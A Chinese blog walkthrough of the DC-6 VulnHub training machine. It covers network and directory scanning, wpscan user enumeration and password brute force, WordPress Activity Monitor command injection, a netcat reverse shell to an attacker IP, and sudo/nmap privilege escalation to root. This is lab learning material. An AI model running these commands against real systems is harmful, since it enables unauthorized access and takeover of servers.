渗透DC-6

最新推荐文章于 2022-10-26 18:59:34 发布
最新推荐文章于 2022-10-26 18:59:34 发布
阅读量126 收藏
点赞数
分类专栏: 渗透测试 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/119243646
版权

0x00 DC-6环境介绍

DC-6考察知识点为命令注入,中间寻找线索的途径稍微有点曲折,小黄将正确思路笔记记下,自己第一次还得多研究研究

0x01 信息收集

1)IP收集—192.168.213.148
同局域网使用arp扫描,当然也可以使用nmap都行

arp-scan -l

2)端口收集 nmap扫描全端口–ssh端口:22 web页面端口:80

nmap  -A -p- 192.168.213.148

3)目录枚举出后台地址 —wordy/wp-admin/

dirb http://wordy

登录web页面继续寻找信息

0x02 渗透测试

登录web页面,发现开源框架,使用wpscan爆破网站账号

wpscan --url http://wordy -e u

发现三个账号
通过信息收集到/usr/wordlists/rockyou.txt.gz好像是一个密码字典,将收集账号作为账户字典,通过zcat查看压缩文件内容,将k01内容提取出来内容作为密码字典爆破

zcat /usr/wordlists/rockyou.txt.gz | grep k01 > /tmp/dc-6pass.txt

账号字典
密码字典
爆破出一个账号与密码

wpscan --url http://wordy -U /root/桌面/1.txt -P /tmp/dc-6pass.txt

爆破出后台账号
登录后台信息收集
登录后台
经过检测,在后台发现命令注入,
命令注入
通过 searchsploit 搜索 activeity monitor(活动监视器)

sudo searchsploit activeity monitor

利用脚本
查看插件脚本漏洞,提示使用nc反弹端口接受shell
nc反弹shell

发现输入信息长度有限制,无法使用更多的命令,通过修改js代码,将内容限制加大,输入

修改js限制输入长度代码

nc反弹shell:

1.攻击机使用nc接受指定端口等待 nc -lnvp 1111
2.受害机将shell权限指定IP端口发送外联 nc 192.168.213.129 1111 -e /bin/bash
3.攻击机接受shell
获得普通用户shell
使用pytohn插件优化shell显示
优化shell
通过信息收集发现敏感账户,以及一个账户密码
账户

进入目录一一查看,发现一个账号密码
发现账号
使用ssh登录账号
登录ssh
查看用户权限操作

sudo -l

发现只能以jens运行

以jens路径编辑脚本,将里面命令注释,加入我们想要的命令
加入sudo -l 运行发现新的提权命令
准备开始提权

0x03 权限提升

提示我们使用nmap提权,使用namp可以无需密码权限使用,

提权思路: 将root权限bin/sh写入脚本插件,使用nmap运行脚本插件
使用namp执行脚本,执行命令不会显示命令,建议使用python交互shell后更直观,提权成功
提权成功

渗透结束

第一次尝试渗透靶机还得多研究,小黄将全部正确思路写出,并没有将曲折的经历写上。

告白热
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
DC-6 渗透测试
Darklord.W
04-14 1853
DC-6渗透测试 0x00实验环境 靶机:DC-6,IP地址:192.168.8.141 测试机:Kali,IP地址:192.168.8.140; 0x01实验流程 信息收集——主机发现、端口扫描 渗透测试 0x02实验步骤 主机发现 端口及服务扫描 访问web端 考虑需要添加hosts记录 正常访问 Wpscan扫描站点 wpscan --url...
Vulnhub靶机 DC-6 打靶实战 详细渗透测试过程
rumil的博客
04-20 983
查看sudo -l 下的内容,发现有jens用户权限执行的脚本,正是刚才我们刚才看见的shell脚本,接下来可以利用此,来反弹jens用户权限的shell。当前目录下无可利用的文件信息,查看家目录,发现有四个用户信息,逐一查看,发现在jens家目录和mark家目录下有文件信息,逐一查看。mark家目录下有一个文件夹,文件夹当中为一个txt文本文件,查看后发现graham用户的信息,尝试ssh远程登录到graham。发现可以正常的命令回显,那么接下来直接进行反弹shell,kali端开启监听。
DC-6靶机渗透测试详细教程
啊醒的博客
05-04 2581
DC-6靶机渗透测试详细教程
DC-6靶机渗透
m0_62008601的博客
05-31 556
攻击机kali:192.168.56.102 靶机dc-6:192.168.56.107 为确保两台服务器在同一网段下,我这里dc-6的网络设置为仅主机网络,kali的设置为桥接模式,这样才能通过kali扫描出dc-6靶机的ip。 配置好环境之后就可以开始操作了 扫描存活的主机 扫描靶机开放的端口 看到开放了80端口和22端口,浏览器进行访问 无法访问,这个问题和前面的一个靶机类似,存在域名解析错误,知道了域名为wordy,就可以去hosts文件(在/etc/hosts).
渗透测试:DC-6靶机
Ciyaso的博客
08-21 288
一、扫描获取靶机ip arp-scan -l 192.168.203.145 二、获取网站信息 1.nmap nmap -sV -A 192.168.203.145 开放了22、80端口 访问主页,发现访问不了,和DC-2一样存在重定向,需要修改hosts文件 成功访问 2.Wappaloyzer CMS:WordPress 操作系统:Debian 数据库:Mysql Web服务器:Apache 2.4.25 3.wpscan 由于使用的是WordPress,所以我们使用wpsacn进行扫描
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
VulnHub渗透测试靶场- DC-8
11-21
DC-8 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这个挑战有点像实际挑战和“概念验证”,即在 Linux 上安装和配置的双因素身份验证是否可以防止 Linux 服务器被利用。 此挑战的“概念...
VulnHub 渗透测试靶场 -DC-9
11-21
DC-9 是另一个专门建造的易受攻击的实验室,旨在获得渗透测试领域的经验。 这一挑战的最终目标是扎根并读取唯一的标志。 Linux 技能和熟悉 Linux 命令行是必须的,还有一些基本渗透测试工具的经验。 对于初学者来...
vuInhub靶场实战系列-DC-6实战
最新发布
05-29
vuInhub靶场实战系列-DC-6实战
DC-4-Web渗透测试靶机
01-19
DC-4-Web渗透测试靶机】是一个专门为网络安全专业人士设计的模拟环境,主要用于学习和实践Web渗透测试技术。在Web渗透测试中,目标是识别并利用网站应用程序的安全漏洞,以便于预防或修复这些漏洞,保护真实的网络...
渗透项目】靶机DC-6渗透过程
命运的旋律的博客
05-05 701
信息收集 主机发现 nmap -sn 192.168.189.0/24 端口扫描 nmap -sT -v -A 192.168.72.158 --script=vuln 发现开放了80端口,尝试用浏览器对该站点进行访问 该网站应该做了访问限制,只能通过域名的方式访问,但因为本地hosts中缺少对应的IP,导致域名解析失败而无法进行访问,解决办法是在hosts文件中写入对应域名和IP...
VULNHUB靶机渗透——DC-6(Activity monitor远程命令执行漏洞利用)
aarong的博客
12-28 3304
靶机来源:https://www.vulnhub.com/entry/dc-6,315/ 1.扫描(arp-scan和nmap) 可以看到靶机开放了两个端口分别是22和80 2.打开浏览器浏览靶机网页 发现打不开这个网站,分析原因发现URL上并没有显示刚刚输入的靶机IP,而是变成了wordy,那么有可能是本地hosts文件没有解析到这个IP。 所以打开hosts文件绑定靶机IP: 路径为/etc/hosts 修改为: 靶机IP wordy 再次打开浏览器访问就可以访问成功了: 发现这个网页使用的是非
DC系列(6)DC-6靶机渗透
Nikris的博客
01-12 3632
DC6
vulnhub靶机DC-6渗透笔记
liver100day的博客
06-22 376
靶机环境搭建 渗透机: kali IP地址:192.158.75.128 靶机: DC-6 IP地址:位置 靶机下载地址:https://www.vulnhub.com/entry/dc-6,315/ 渗透过程 1.信息收集 1.1 主机发现 arp-scan -l 扫描局域网所有设备(所有设备IP、MAC地址、制造商信息) 也可以使用namp进行主机发现 nmap 192.168.75.0/24 同样扫描出了目标靶机IP地址,并且还扫描出了目标开启了22(ssh)和 80(http) 两种扫
DC-6靶机测试渗透详细教程
wwxxss
10-26 1291
DC-6的靶场详细渗透过程
dc-6 靶机渗透学习
..
03-21 1728
信息收集 扫描当前网段,确定存活主机 nmap -sP 192.168.202.0/24 对靶机进行端口扫描,发现80、22端口开放 nmap -A -p- -v 192.168.202.145 访问80端口,发现和dc-2一样的问题,会自动跳转到域名,需要手动在hosts文件加入ip对应关系。 修改后重新访问80端口,用Wappalyzer扫描一下框架,发现是WordPress 根据靶机作者的提示,大致就知道是通过爆破来做 用专门的CM...
Vulnhub靶机:DC-6渗透详细过程
IerkeU的博客
03-12 2768
DC-6 前情提要 靶场地址:https://www.vulnhub.com/entry/dc-6,315/ DC-6是一个中级的靶场,需要具备以下前置知识: 基础的Linux命令及操作 基础的渗透测试工具使用(Kali / Parrot下的工具) 翻译一下官方给出的一些信息: 这个靶场需要具备初中级的渗透测试技巧,这并不是一个很困难的挑战,因此对初学者来说应该很友好,你的最终目标是放在root目录下的flag。 并且,官方给了一个线索:cat /usr/share/wordlists/rockyou.
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放...以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值